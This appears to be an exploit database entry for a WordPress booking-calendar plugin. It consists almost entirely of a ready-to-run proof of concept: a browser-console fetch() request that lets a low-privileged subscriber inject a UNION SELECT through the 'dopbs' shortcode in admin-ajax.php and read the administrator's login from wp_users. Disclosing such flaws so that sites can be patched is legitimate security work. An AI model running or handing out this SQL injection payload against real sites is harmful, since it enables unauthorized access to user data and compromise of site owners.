Share
## https://sploitus.com/exploit?id=WPEX-ID:D6D976BE-31D1-419D-8729-4A36FBD2755C
Note: A Calendar is needed (if there is not one already).

Run the below command in the developer console of the web browser while being on the blog as a subscriber

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=parse-media-shortcode&shortcode=[dopbs id=\'1\' lang=\'en UNION SELECT 100000, CONCAT("DAY_MONDAY"), "", "", user_login COLLATE utf8mb4_unicode_520_ci,"frontend" FROM wp_users WHERE wp_users.ID = 1 --\']'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

The login of the first user (ie the admin) will be displayed in the calendar data json, within the text[names] attribute.